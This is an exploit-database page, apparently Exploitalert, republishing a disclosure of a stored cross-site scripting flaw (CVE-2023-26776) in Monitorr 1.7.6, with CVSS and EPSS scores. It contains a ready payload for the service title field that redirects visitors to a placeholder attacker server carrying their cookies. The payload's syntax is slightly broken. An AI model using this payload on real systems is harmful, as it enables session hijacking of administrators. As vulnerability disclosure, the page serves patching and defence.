Advertisement






Monitorr 1.7.6 Cross Site Scripting

CVE Category Price Severity
CVE-2023-26776 CWE-79 Not specified High
Author Risk Exploitation Type Date
Artsploit Critical Remote 2023-04-05
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023040020

Below is a copy:

Monitorr 1.7.6 Cross Site Scripting
# Exploit Title: Monitorr v1.7.6 - Cross Site Scripting
# CVE: CVE-2023-26776
# Exploit Author: Achuth V P (retrymp3)
# Date: February 09, 2023
# Vendor Homepage: https://github.com/Monitorr/
# Software Link: https://github.com/Monitorr/Monitorr
# Tested on: Ubuntu
# Version: v1.7.6
# Exploit Description:  Cross Site Scripting vulnerability found in Monitorr v.1.7.6 allows a remote attacker to execute arbitrary code via the title parameter of the post_receiver-services.php file.

Attacker can create a service configuration at <base-url>/assets/php/post_receiver-services.php with the title of the service being something like; <script>document.location="<your-server>?cookie="document.cookie</script> or just <script>document.cookie</script>
The injected script tag is executed everytime the home page is loaded.

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.